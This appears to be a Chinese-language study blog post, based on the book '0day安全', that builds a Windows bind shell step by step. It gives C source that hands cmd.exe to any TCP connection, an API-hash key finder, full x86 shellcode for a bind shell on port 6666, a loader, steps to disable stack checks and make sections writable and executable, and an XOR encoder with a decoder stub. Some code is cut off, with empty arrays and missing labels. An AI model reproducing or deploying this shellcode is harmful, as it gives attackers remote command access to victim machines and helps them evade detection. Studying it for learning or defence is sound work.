最近學習《0day安全》一書 記錄一下除錯編碼過程
書中環境XP VC6 本機的環境是server 2008 r2 x64 編譯環境是vs2013
首先是寫一個win c版本的bindshell 程式碼如下:
#include<winsock2.h> #pragma comment(lib,"Ws2_32.lib") void main() { //1.初始化一個socket服務 WSADATA stWSA; WSAStartup(0x0202, &stWSA); SOCKET stListen = INVALID_ATOM; //2.建立一個原始套接字 stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0); SOCKADDR_IN stService; stService.sin_addr.s_addr = INADDR_ANY; //3.在任意地址上繫結一個埠 stService.sin_port = htons(1414); stService.sin_family = AF_INET; bind(stListen, (LPSOCKADDR)&stService, sizeof(stService)); //4.監聽連線 listen(stListen, SOMAXCONN); //5.接受一個連線 stListen = accept(stListen, 0, 0); //6.建立一個cmd程序 並將其輸入與輸出重定位到我們建立的套節字上 PROCESS_INFORMATION stPI = { 0 }; STARTUPINFOA stSI = { 0 }; stSI.cb = sizeof(stSI); stSI.wShowWindow = SW_HIDE; stSI.dwFlags = STARTF_USESTDHANDLES; stSI.hStdInput = (HANDLE)stListen; stSI.hStdError = (HANDLE)stListen; stSI.hStdOutput = (HANDLE)stListen; CreateProcessA(0, "cmd.exe", 0, 0, TRUE, 0, 0, 0, &stSI, &stPI); //7.關閉相關控制代碼並釋放相關資源 CloseHandle(stPI.hProcess); CloseHandle(stPI.hThread); closesocket(stListen); WSACleanup(); return; }
一來可以看看怎麼實現 需要用到哪些API 二來可以 後邊與shellcode做的效果對比
需要用到的ws2_32中的API有 WSAStartup WSASocketA bind listen accept
再加上shellcode框架所需的kernel32.dll中的API有 LoadLibraryA CreateProcessA ExitProcess 一共8個函式
取得這些函式名的hash摘要 用於後邊尋找上邊8個函式地址 具體方法原理 參考
這裡值得注意的是 為了減少shellcode的程式碼量 把每個函式名的hash結果規定為一個位元組
一個位元組最大有256個數 最多能分辨256個API 書中環境的kernel32.dll API數量900多個
雖會出現hash碰撞 但能找到合理的key 算出函式名稱的hash 在shellcode中定位API時 第一個出現所需函式 從而得到函式地址
本機測試系統kernel32.dll中有1500多個 遍歷0~0xff都無法找到一個key 讓上邊8個函式同時滿足
所以修改為kernel32.dll為一個key ws2_32.dll為一個key 分別算出函式名對應的hash摘要 用到後邊的shellcode定位中
由於手動嘗試效率較低 顧寫程式獲得 程式碼如下:
#include<windows.h> #include<stdio.h> //得到API字串的單位元組hash摘要 unsigned char GetHash(char * fun_name, unsigned char cXor) { unsigned char cValue; __asm { pushad pushfd mov esi,fun_name cdq hash_loop: lodsb xor al, cXor sub dl, al cmp al, cXor jne hash_loop mov cValue, dl popfd popad } return cValue; } void main() { char listDllApi[][10][20] = { { "kernel32.dll", "LoadLibraryA", "CreateProcessA", "ExitProcess" }, { "ws2_32.dll", "WSAStartup", "WSASocketA", "bind", "listen", "accept" } }; unsigned char cHash; ULONG ulDllBase = NULL, ulAddr=0, nCount=0; PCHAR pFunctionName = NULL; BOOL bFind=TRUE; for (int n = 0; n < _countof(listDllApi) ; n++) { for (int i = 0; i < 0xff; i++) { bFind = TRUE; for (int m = 0; m < _countof(listDllApi[n]) && strlen(listDllApi[n][m])>0; m++) { if (m == 0) { ulDllBase = (ULONG)LoadLibraryA(listDllApi[n][m]); continue; } cHash = GetHash(listDllApi[n][m], i); ulAddr = *(PULONG)(ulDllBase + 0x3c); ulAddr = *(PULONG)(ulDllBase + ulAddr + 0x78); nCount = *(PULONG)(ulDllBase + ulAddr + 0x14); ulAddr = *(PULONG)(ulDllBase + ulAddr + 0x20); for (int x = 0; x < nCount; x++) { pFunctionName = (PCHAR)(*(PULONG)(ulDllBase + ulAddr + 4 * x) + ulDllBase); if (GetHash(pFunctionName, i) == cHash) { break; } } if (strcmp(pFunctionName, listDllApi[n][m]) != 0) { bFind = FALSE; break; } } if (bFind) { printf("\n%s find xor unsigned char : 0x%x\n", listDllApi[n][0], i); for (int m = 1; m < _countof(listDllApi[n]) && strlen(listDllApi[n][m])>0; m++) { printf("%s hash key is:0x%x\n", listDllApi[n][m], GetHash(listDllApi[n][m], i)); } } } } getchar(); }
尋找到結果還有很多 這只是一部分 然後把8個api的值放入od中 看看彙編程式碼是什麼 這裡用到的思想是 程式碼是資料 資料是程式碼
這些值放在shellcode的最前邊 用於後邊定位API的hash比較的 執行他們不需要什麼功能 只要不發生錯誤 不改變程式流程就行
經測試kernel32.dll使用0x39 對應API的hash摘要 LoadLibraryA:0x81 CreateProcessA:0xd9 ExitProcess:0x19
ws2_32.dll使用0x6e 對應API的hash摘要 WSAStartup:0x18 WSASocketA:0x49 bind:0x75 listen:0x47 accept:0x26
可以看到這幾條彙編指令並不影響 程式的流程 最後的0x43是後邊的資料
至此基本確定了dll api的hash
編寫shellcode的彙編程式碼 具體如下:
// eax points here
// function hashes (executable as nop-equivalent)
_emit 0x81 // LoadLibraryA // sbb ecx, 0x75491819
_emit 0xd9 // CreateProcessA // ...
_emit 0x19 // ExitProcess // ...
_emit 0x18 // WSAStartup // ...
_emit 0x49 // WSASocketA // ...
_emit 0x75 // bind // ...
_emit 0x47 // listen // inc edi
_emit 0x26 // accept // inc ebx
// CMd
_emit 0x43 // inc ebx
_emit 0x4d // dec ebp
_emit 0x64 // FS:
// start of proper code
cdq // set dex=0 (eax points to stack so is less than 0x80000000)
xchg eax,esi // esi = addr of first function hash
lea edi, [esi-0x18] // edi = addr of start writing function
// address (last addr will be written just before "cmd")
// find base addr of kernel32.dll
mov ebx, fs:[edx+0x30] // ebx = address of PEB
mov ecx, [ebx+0x0c] // ecx = pointer to loader data
mov ecx, [ecx+0x1c] // ecx = first entry in initialisation order list
mov ecx, [ecx] // ecx = second entry in list kernelbase.dll
mov ecx, [ecx] // ecx = three entry in list kernel32.dll
mov ebp, [ecx+0x08] // ebp = base address of kernel32.dll
// make some stack space
mov dh,0x03 // sizeof(WSADATA) is 0x190
sub esp,edx
// push a pointer to "ws2_32" onto stack
mov dx,0x3233 // rest of edx is null
push edx
push 0x5f327377
push esp
// set hash key of kernel32.dll
mov dh, 0x39
lodsb // load next hash into al and increment esi
cmp al, 0x18 // hash of "WSAStartup" - trigger LoadLibrary("ws2_32")
jne find_functions
xchg eax,ebp // save current hash
call[edi - 0xc] // LoadLibraryA
xchg eax,ebp // restore current hash, and update ebp
// whith base address of ws2_32.dll
push edi // save location of addr of first winsock function
// set hash key of ws2_32.dll
mov dh, 0x6e
pushad // preserve registers
mov eax, [ebp+0x3c] // eax = start of PE header
mov ecx, [ebp+eax+0x78] // ecx = relative offset of export table
add ecx,ebp // ecx = absolute addr of export table
mov ebx, [ecx+0x20] // ebx = relative offset of names table
add ebx,ebp // ebx = absolute addr of names table
xor edi,edi // edi will count through the functions
inc edi // increment function counter
mov esi, [ebx+edi*4] // esi = relative offset of current function name
add esi,ebp // esi = absolute addr of current function name
xor dl,dl
lodsb // load next char into al and increment esi
xor al, dh // xor current char with 0x70
sub dl, al // update hash with current char
cmp al, dh // loop until we reach end of string
jne hash_loop
cmp dl, [esp + 0x1c] // compare to the requested hash (saved on stack from pushad)
jnz next_function_loop
//we now have the right function
mov ebx, [ecx + 0x24] // ebx = relative offset of ordinals table
add ebx, ebp // ebx = absolute addr of ordinals table
mov di, [ebx + 2 * edi] // di = ordinal number of matched function
mov ebx, [ecx + 0x1c] // ebx = relative offset of address table
add ebx, ebp // ebx = absolute addr of address table
add ebp, [ebx + 4 * edi] // add to ebp (base addr of module) the relative
// offset of matched function
xchg eax, ebp // move func addr into eax
pop edi // edi is last onto stack in pushad write
stosd // functon addr to [edi] and increment edi
push edi
popad // restore registers
cmp esi, edi // loop until we reach end of last hash
jne find_lib_functions
pop esi // saved location of first winsock function
// we will lodsd and call each func in sequence
// initialize winsock
push esp // use stack for WSADATA
push 0x02 // wVersionRequested
call eax // WSAStartup
// null-terminate "cmd"
mov byte ptr[esi + 0x13], al // eax ==0 if WSAStartup() worked
// clear some stack to use as NULL parameters
lea ecx, [eax+0x30] // sizeof(STARTUPINFO) = 0x44
mov edi,esp
rep stosd // eax is still 0
//create socket
inc eax
push eax // type = 1 (SOCK_STREAM)
inc eax
push eax // af = 2 (AF_INET)
call eax // WSASocketA
xchg ebp,eax // save SOCKET descriptor in ebp
// (safe from being changed by remaining API calls)
// push bind parameters
mov eax, 0x0a1aff02 // ox1a0a = port 6666, 0x02 = AF_INET
xor ah,ah // remove the ff from eax
push eax // we use 0x0a1a0002 as both the name (strucht sockaddr)
// and namelen (which only needs to be large enough)
push esp // pointer to our sockaddr struct
// call bind(), linsten() and accept() in turn
push ebp // save SOCKET descriptor (we implicitly pass NULL for all other params)
call eax // call the next function
test eax,eax // bind() and listen() return 0,
// accept() returns a SOCKET descriptor
jz call_loop
// initialise a STARTUPINFO structrue at esp
inc byte ptr[esp+0x2d] // set STARTF_USERTDHANDLES to true
sub edi,0x6c // point edi at hStdInput in STARTUPINFO
stosd // use SOCKET descriptor returned by accept (still in eax)
// as the stdin handle same for stdout
stosd // same for stderr (optional)
// create process
pop eax // set eax = 0 (STARTUPINFO now at esp+4)
push esp // use stack at PROCESSINFORMATION structure
// (STARTUPINFO structrue)
push esp // STARTUPINFO structrue
push eax // lpCurrentDirectory = NULL
push eax // lpEnvironment = NULL
push eax // dwCreationFlags = NULL
push 1 // bInheritHandles = TRUE
push eax // lpThreadAttributes = NULL
push eax // lpProcessAttributes = NULL
push esi // lpCommandLine = "cmd"
push eax // lpApplicationName = NULL
call[esi-0x1c] // CreateProcessA
// call ExitProcess()
call[esi-0x18] //ExitProcess
1.kenel32.dll和ws2_32.dll分別取了hash key 下邊的各個函式分別用了2組hash key來計算hash摘要
2.匯出表取kernel32.dll基地址 當前系統是排在第三個 書上環境是排在第二個
3.CreateProcessA函式 引數 bInheritHandles = TRUE 經測試有效 如果為FALSE 無法測試通過
得到對應的十六進位制程式碼 並放入shellcode載入框架
把以上程式碼放入vs編譯後 用OD開啟 得到對應二進位制碼 在修改為VS中識別的十六進位制碼
截圖只是一部分 二進位制複製到editplus中 修改為vs中識別的十六進位制
再使用shellcode通用載入框架 程式碼如下:
char sc[] =
void main()
lea eax, sc
push eax
編譯前需要修改VS中的編譯引數 去掉VS的棧溢位檢查程式碼 具體如下:
這樣一來編譯出的執行檔案就沒有棧檢查了 shellcode通用框架也可以使用了
此時直接執行EXE還是會出錯 經除錯發現是記憶體許可權問題 棧空間預設 沒有執行和寫的許可權
用LordPE Deluxe開啟EXE 修改節區屬性 修改前後如圖
其實通過OD發現 棧空間其實在.data中 只需要修改.data就可以了 為了防止其他情況這裡就全部修改了
Flags的E0000040 對應許可權是:
測試機IP是 再測試機執行此EXE
在其他機器 telnet 6666 效果如下:
至此shellcode版本的bindshell就實現了 但為了融合前邊的變形技術 繼續變形shellcode
變形的原理是xor 然後把解密頭 放在程式碼最前邊 有點類似於殼中的技術
char sc[] =
void encoder(char * input, unsigned char key, int display_flag)
int i = 0, len = 0;
FILE * fp;
unsigned char * output;
len = strlen(input);
output = (unsigned char *)malloc(len + 1);
if (!output)
printf("memory erro!\n");
for (int i = 0; i < len; i++)
output[i] = input[i] ^ key;
if (!(fp = fopen("encode.txt", "w+")))
printf("output file create erro");
fprintf(fp, "\"");
for (i = 0; i < len; i++)
fprintf(fp, "\\x%0.2x", output[i]);
if ((i + 1) % 16 == 0)
fprintf(fp, "\"\n\"");
fprintf(fp, "\";");
printf("dump the encode shellcode to encode.txt OK!\n");
if (display_flag)
for (i = 0; i < len; i++)
printf("%0.2x ", output[i]);
if ((i + 1) % 16 == 0)
encoder(sc, 0x41, 1);
add eax, 0x14
xor ecx, ecx
decode_loop :
mov bl, [eax + ecx]
xor bl, 0x41
mov[eax + ecx], bl
inc ecx
cmp bl, 0x90
jne decode_loop
把解密函式放到vs中 編譯後在od中提取十六進位制碼 如下圖
複製到editplus中修改為vs可用的十六進位制碼 如下圖
把解密程式碼放到加密後的shellcode前 完整程式碼如下:
char sc2[] =
void main()
lea eax, sc2
push eax
此時編譯EXE 修改節區許可權 效果如先前
這樣從 API實現 到shellcode編寫除錯 到加密就完成了